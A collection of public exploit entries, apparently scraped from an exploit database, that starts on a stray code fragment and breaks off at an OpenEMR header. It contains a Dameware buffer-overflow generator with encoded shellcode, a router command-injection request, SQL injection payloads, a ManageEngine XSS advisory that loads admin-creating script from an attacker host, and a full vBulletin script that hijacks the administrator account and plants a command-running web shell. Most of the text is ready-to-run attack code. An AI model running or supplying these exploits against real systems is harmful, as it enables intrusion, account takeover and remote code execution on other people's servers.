'\x30\x82\x41' f.write(payload) f.close()
-
Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273
# Vendor Homepage: https://www.solarwinds.com/
# Version: 12.1.1.273
# Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe
# Tested on: Windows 7 x86
"""
poc
1. Run exploit and copy contents of payload.txt
2. Open Dameware Remote Support
3. Click Add active directory support
4. Write any ip address in name or ip address field
5. paste payload.txt content to display name field and click ok
6. Click ok when error pops up
7. Click Yes in dialog box
8. calc pops up

Actually, i cant create this exploit with reliable exit, that's why calculator will be
executed in background lol :D . but it is not big issue, the main thing is that arbitary
code is executed

Layout of the string written to payload.txt (see `payload` below):
1764 filler bytes, nSEH, SEH, the EAX alignment stub, padding, the encoded
shellcode, then filler up to max_length bytes in total.
"""
# Text-mode file; the "\x.." escapes below are written as characters, not raw bytes.
# NOTE(review): the name `file` shadows the Python 2 builtin of the same name.
file = open('payload.txt','w')
max_length = 3604                               # total length the payload is padded to
padding_until_eax = '\x6e\x41' * 57 + '\x6e'    # 115 bytes between the stub and the shellcode
align_eax = (
    "\x41"          # padding (one byte)
    "\x6e"          # padding
    "\x05\x14\x11"  # add eax,11001400
    "\x6e"          # padding
    "\x2d\x13\x11"  # sub eax,11001300  (net EAX += 0x100 per the author's annotations)
)
'''
How the shellcode below was produced (author's note):
msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw
./alpha2 eax --unicode --uppercase < shellcode.raw
'''
shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA'
'''
ppr address 00b3007e (DNTU.exe)
'''
# Two-character values: the author's "unicode compatible" remarks suggest the pasted
# text is widened by the target before it reaches the stack -- not verifiable here.
nSEH = '\x61\x6e' # unicode compatible padding
SEH = '\x7e\xb3'  # 0x00b3007e once widened, see the ppr note above
payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode
payload += 'A' * (max_length-len(payload))      # pad to exactly max_length
print('Payload length:{}'.format(len(payload)))
file.write(payload)
file.close()
-
Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution # Google Dork: Not applicable # Date: 2020-05-13 # Exploit Author: Seecko Das # Vendor Homepage: https://www.crtindia.com/ # Version: V3.3.0-190627 # Tested on: Windows 10/Linux (Kali) # CVE: N/A Exploit : curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬ��ģ��--> <html> <head> <title>PING���Խ��</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳ����css--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳ�����ű�--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--��ҳ����--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Please wait</b> <br><br> </div> <pre> boa.conf web </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")> </div> </form> </blockquote> </body> </html>
-
Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection # Exploit Author: jul10l1r4 (Julio Lira) # Google Dork: N/A # Date: 2020-05-16 # Vendor Homepage: https://mikrotik.com # Software Link: https://mikrotik.com/download # Version: <= 1.2.3 # Tested on: Debian 10 buster # CVE: 2020-13118 Description: SQL Injection found in check_community.php:49 $community = $_GET['community']; $_SESSION['community'] = $community; $query = "SELECT name from router where `community`=' $community'"; PoC: http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI SQLmap using: sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3
-
ManageEngine Service Desk 10.0 - Cross-Site Scripting
# Exploit Title: ManageEngine Service Desk 10.0 - Cross-Site Scripting # Date: 2020-05-14 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/service-desk/download.html # Version: 10.0 (10000.0.0.0) # Tested on: Windows 10 # CVE : CVE-2019-15083 [SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]------------------------------ SECURITY ADVISORY: SPUK-2019-04/ManageEngine Service Desk XSS in remote IT Assets Management Affected Software: ManageEngine Service Desk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D) Vulnerability: Cross-Site Scripting CVE: CVE-2019-15083 CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N) Severity: Medium Release Date: 2020-05-14 I. Background ~~~~~~~~~~~~~ From ManageEngine's website: "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike. Version Enterprise: help desk + ITIL + asset + project The complete ITIL ready ITSM suite with all features that an IT service desk needs. * Incident management * Problem management * Change management * IT project management * Service catalog * Asset management * CMDB" II. Description ~~~~~~~~~~~~~~~ From wks administrator to Manage Engine Administrator: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to a XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the Manage Engine ServiceDesk administrator side. 
On "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names in the column "Software". In this field, and probably in others, a remote attacker can inject malicious code that executes when the ManageEngine administrator views this page. In this case, the provided proof of concept creates an administrator user on ManageEngine Service Desk. PoC: ~~~~ 1. Log in to the workstation managed by ManageEngine with a local administrator account. 2. Open regedit.exe as administrator 3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>" 4. Change the current "DisplayName" to this value: test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla 5. On the root of the <attacker_ip> web server, deploy the file "addadmin.js" with this content: var createAdminParams= "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save"; // Save the CSRF cookie into a variable var sdpcsrfcookie; carr = document.cookie.split(";"); for (i=0;i<carr.length;i++){ if (carr[i].split("=")[0].trim() == "sdpcsrfcookie"){ sdpcsrfcookie=carr[i].split("=")[1].trim(); } } if (sdpcsrfcookie === undefined){ console.log("No CSRF cookie was found. 
Aborting the PoC :-(") } else { var ajaxreq = new XMLHttpRequest(); ajaxreq.open('POST', '/TechnicianDef.do'); ajaxreq.withCredentials = true; ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml"); ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie); // Update the CSRF token parameter with the token present in the user cookie params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie); console.log("posting to create a new admin user: "+params); ajaxreq.send(params); } 6. Reboot the workstation to force the agent to update the program list. 7. Now, log in as the administrator of ManageEngine SelfService. 8. Navigate to "Asset Home > Server > <workstation> > software" 9. Click on the "Next" button until the software name is shown in the table. 10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4 " has been created. III. Impact ~~~~~~~~~~~ The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk, with no need for the attacker to access the web application. This PoC shows the creation of an administrator of ManageEngine, but it can potentially be used to create Domain Admin users if the service is configured properly, therefore compromising the whole domain the workstation belongs to. CVSS 3.0 Score: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N IV. Remediation ~~~~~~~~~~~~~~~ Sanitize all the input from the remote agents before showing the values in the web page. Apply the usual XSS protection also to values that are not directly entered through the application's web forms. V. Disclosure ~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre (Felipe (at) SensePost.com) Vendor Informed: 2019-04-30 Patch Release Date: 2019-04-16 Public Ack. 
of the vuln: 2020-05-13 Advisory Release Date: 2020-05-14 ---------------------------------[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]---
-
E-Commerce System 1.0 - Unauthenticated Remote Code Execution
# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV) # Date: 2020-05-14 # Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5 # Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ### Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload Vulnerabilities url: http://thiennv.com/ecommerce/index.php?q=profile Exploitation: POST /ecommerce/customer/controller.php?action=photos HTTP/1.1 Host: thiennv.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828 Content-Length: 4723 Origin: http://thiennv.com Connection: close Referer: http://thiennv.com/ecommerce/index.php?q=profile Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7 Upgrade-Insecure-Requests: 1 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="photo"; filename="logo1.php" Content-Type: image/png ‰PNG IHDR á á m"H &PLTEÝ=1ÿÿÿ <?php phpinfo() ?> 
-----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="savephoto" -----------------------------270177040916945863071313890828-- ###POC 2: Unauthenticated SQL Injection Vulnerabilities url: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' Exploitation: Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR 6075=6075# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- [11:22:17] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [11:22:17] [INFO] fetching database names available databases [6]: [*] db_ecommerce [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test -------------------------------------------------------------------------------------------------------------Best Regards! (*Mr) Ngo Van Thien*
-
vBulletin 5.6.1 - 'nodeId' SQL Injection
# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection
# Date: 2020-05-15
# Exploit Author: Photubias
# Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
# Version: vBulletin v5.6.x (prior to Patch Level 1)
# Tested on: vBulletin v5.6.1 on Debian 10 x64
# CVE: CVE-2020-12720
# vBulletin v5.6.1 (SQLi) with path to RCE
#!/usr/bin/env python3
'''
Copyright 2020 Photubias(c)

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.

File name CVE-2020-12720.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
##-->> Full creds to @zenofex and @rekter0 <<--##

Flow, see main(): verifyBug() -> takeoverAccount() -> createBackdoor() -> one GET
of the created page with ?cmd=... and the text between the two
'###SHELLRESULT###' markers printed.  Every request goes through getData(),
which shares one cookie jar and exits the process on any error.
'''
import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string

## Static vars; change at will, but recommend leaving as is
sADMINPASS = '12345678'          # admin password used when the automatic takeover is skipped or fails
sCMD = 'id'                      # default command when none is given on the command line
sURL = 'http://192.168.50.130/'
sUSERID = '1'                    # userid assumed for the administrator account
sNEWPASS = '87654321'            # password that takeoverAccount() sets on the admin account
iTimeout = 5                     # per-request timeout in seconds, see getData()

## Ignore unsigned certs
## NOTE: this disables TLS certificate verification process-wide, for every HTTPS request made here.
ssl._create_default_https_context = ssl._create_unverified_context

## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))


def randomString(stringLength=8):
    '''Return stringLength lowercase ASCII letters drawn with random.choice (not a CSPRNG).'''
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))


def getData(sUrl, lData):
    '''POST lData (form-urlencoded) to sUrl through the shared cookie-aware opener.

    Returns the open response object; callers read()/decode() it themselves.
    The except clause is bare, so any exception -- urllib errors but also
    KeyboardInterrupt -- is reported as "site down?" and ends the process
    with sys.exit(1).
    '''
    try:
        oData = urllib.parse.urlencode(lData).encode()
        oRequest = urllib.request.Request(url = sUrl, data = oData)
        return oOpener.open(oRequest, timeout = iTimeout)
    except:
        print('----- ERROR, site down?')
        sys.exit(1)


def verifyBug(sURL,sUserid='1'):
    '''Return True when the nodeId[nodeid] parameter is injectable.

    Sends a UNION SELECT carrying the marker string "cve-2020-12720" and
    checks whether the marker is reflected in the response.  The sUserid
    parameter is accepted but never used.
    '''
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'cve-2020-12720' in sResponse:
        print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!')
        return False
    else:
        print('[+] SQLi Success!')
        return True


def takeoverAccount(sURL, sNEWPASS):
    '''Reset the password of an Administrators-group account to sNEWPASS using the SQLi.

    Each step is one getData() round trip whose JSON-ish response is parsed by
    naive split()/replace() chains on the 'rawtext' marker:
      1. table prefix, from information_schema.columns
      2. usergroupid of the "Administrators" group
      3. username|userid|email|token of a user in that group
      4. a human-verification hash from ajax/api/hv/generateToken
      5. the matching captcha answer read back from the humanverify table
      6. auth/lostpw for that e-mail, then the activationid from useractivation
      7. auth/reset-password with sNEWPASS
    Returns sUserid on success, '' when the final response lacks 'Logging in'.
    Steps 2 and 3 index split('rawtext')[1] without first checking that the
    marker is present, so an unexpected response raises IndexError there.
    '''
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    ### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
    ## Get Table Prefixes
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse:
        # the returned table name ends in 'language'; stripping it leaves the bare prefix
        sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','')
    else:
        sPrefix = ''
    #print('[+] Got table prefix "'+sPrefix+'"')
    ## Get usergroup ID for "Administrators"
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')   # unguarded: IndexError if 'rawtext' is absent
    #print('[+] Administrators Group ID: '+sGroupID)
    ## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    # 0x7c is '|', hence the split('|') into exactly four fields (ValueError if the count differs)
    sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|')
    #print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg)
    ## Let's create a Human Verify Captcha
    sPath = 'ajax/api/hv/generateToken?'
    lData = {'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'hash' in sResponse:
        sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','')
    else:
        sHash = ''
    ## Get the captcha answer from DB
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse:
        iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"',''))
    else:
        iAnswers = 1
    # the row count is used as an offset, i.e. the most recently stored answer is read
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse:
        sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else:
        sAnswer = ''
    ## Now request PW reset and retrieve the token
    sPath = 'auth/lostpw'
    lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()   # response is not inspected
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse:
        sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else:
        sToken = ''
    ## Finally the password reset itself
    sPath = 'auth/reset-password'
    lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'Logging in' in sResponse:
        print('[-] Failed to reset the password')
        return ''
    else:
        print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS)
        return sUserid


def createBackdoor(sURL, sADMINPASS, sUserid='1'):
    '''Log in as sUserid with sADMINPASS and save a page whose widget code runs $_GET['cmd'].

    Returns the page name (its resturl).  A hard-coded securitytoken literal is
    sent to ajax/activate-sitebuilder and auth/ajax-login; the real token is
    then parsed out of the login response and used for every later request.
    If the page list already contains a 'cve-2020-12720-' page its name is
    returned without creating another one.  Only the sitebuilder activation and
    the login are fatal on failure; later non-200 responses are just printed.
    '''
    ## Activating Sitebuilder
    sPath = 'ajax/activate-sitebuilder'
    lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200:
        print('[-] Error activating sitebuilder')
        sys.exit(1)
    ## Confirming the password, getting new securitytoken
    sPath = 'auth/ajax-login'
    lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'lostpw' in sResponse:   # a redirect hint to the lost-password page is taken as "login failed"
        print('[-] Error: authentication for userid ' + sUserid + ' failed')
        sys.exit(1)
    sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','')   # second JSON member of the login response
    print('[+] Got token: '+sToken)
    ## cpsession is needed, use this for extra verification
    #for cookie in cj: print(cookie.name, cookie.value, cookie.domain) #etc etc
    ## First see if our backdoor does not already exists
    sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper'
    lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'cve-2020-12720' in sResponse:
        sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0]
        print('[+] This machine was already pwned, using "' + sPageName + '" for your command')
        return sPageName
    ## Create a new empty page
    sPath = 'ajax/api/widget/saveNewWidgetInstance'
    lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','')
    sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','')
    print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID)
    ## Now submitting the page content
    sPageName = 'cve-2020-12720-'+randomString()
    sPath = 'ajax/api/widget/saveAdminConfig'
    lData = {'widgetid':'23', 'pagetemplateid':sPageTemplateID, 'widgetinstanceid':sWidgetInstanceID, 'data[widget_type]':'', 'data[title]':sPageName, 'data[show_at_breakpoints][desktop]':'1', 'data[show_at_breakpoints][small]':'1', 'data[show_at_breakpoints][xsmall]':'1', 'data[hide_title]':'0', 'data[module_viewpermissions][key]':'show_all', 'data[code]':"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');", 'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200:
        print('[!] Error submitting page content for ' + sPageName)
    ## Finally saving the new page
    sPath = 'admin/savepage'
    lData = {'input[ishomeroute]':'0', 'input[pageid]':'0', 'input[nodeid]':'0', 'input[userid]':'1', 'input[screenlayoutid]':'2', 'input[templatetitle]':sPageName, 'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]', 'input[displaysections[1]]':'[]', 'input[displaysections[2]]':'[]', 'input[displaysections[3]]':'[]', 'input[pagetitle]':sPageName, 'input[resturl]':sPageName, 'input[metadescription]':'Photubias+Shell', 'input[pagetemplateid]':sPageTemplateID, 'url':sURL, 'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200:
        print('[!] Error saving page content for ' + sPageName)
    return sPageName


def main():
    '''Entry point.

    With no arguments the URL, admin password and command are prompted for;
    otherwise sys.argv[1] is the URL and sys.argv[2] the command (a single
    argument therefore raises IndexError on the sys.argv[2] read).  Runs
    verifyBug(), takeoverAccount(), createBackdoor() and finally fetches the
    created page, printing what lies between the two '###SHELLRESULT###'
    markers.
    '''
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>')
        print('    Example: ./CVE-2020-12720.py http://192.168.50.130/ "cat /etc/passwd"')
        print('    But for now, ask questions then')
        sURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ')
        if sURL == '':
            sURL = 'http://192.168.50.130'
    else:
        sURL = sys.argv[1]
        sCMD = sys.argv[2]
    # NOTE(review): sURL[:-1] is everything but the last character, so this comparison
    # looks like it was meant to be sURL[-1:] -- as written a '/' is always appended.
    if not sURL[:-1] == '/':
        sURL += '/'
    if not sURL[:4].lower() == 'http':
        sURL = 'http://' + sURL
    print('[+] Welcome, first verifying the SQLi vulnerability')
    if verifyBug(sURL):
        print("----\n" + '[+] Attempting automatic admin account takeover')
        sUSERID = takeoverAccount(sURL, sNEWPASS)
        sADMINPASS = sNEWPASS
        if sUSERID == '':
            sUSERID = '1'
            sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    else:
        # NOTE(review): sUSERID is assigned elsewhere in this function, which makes it a
        # local name; reading it here before any assignment presumably raises
        # UnboundLocalError rather than using the module-level '1' -- confirm.
        sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    print("----\n"+'[+] So far so good, attempting the creation of the backdoor')
    sPageName = createBackdoor(sURL, sADMINPASS, sUSERID)
    if len(sys.argv) == 1:
        sCMD = input('[?] Please enter the command to run [id]: ')
        if sCMD == '':
            sCMD = 'id'
    sCmd = urllib.parse.quote(sCMD)
    sPath = sPageName + "?cmd=" + sCmd
    print('[+] Opening '+sURL + sPath)
    try:
        # plain GET, not via getData(): no form body is sent
        oRequest = urllib.request.Request(url = sURL + sPath)
        oResponse = oOpener.open(oRequest, timeout = iTimeout)
        print('#######################')
        sResponse = oResponse.read().decode()
        print('[+] Command result:')
        print(sResponse.split('###SHELLRESULT###')[1])
    except:   # bare except: also masks an IndexError when the markers are missing
        print('[-] Something went wrong, bad command?')
        sys.exit(1)


if __name__ == "__main__":
    main()
-
OpenEMR 5.0.1 - Remote Code Execution (1)
# Title: OpenEMR 5.0.1 - Remote Code Execution (1)
# Exploit Author: Musyoka Ian
# Date: 2020-05-25
# Title: OpenEMR < 5.0.1 - Remote Code Execution
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
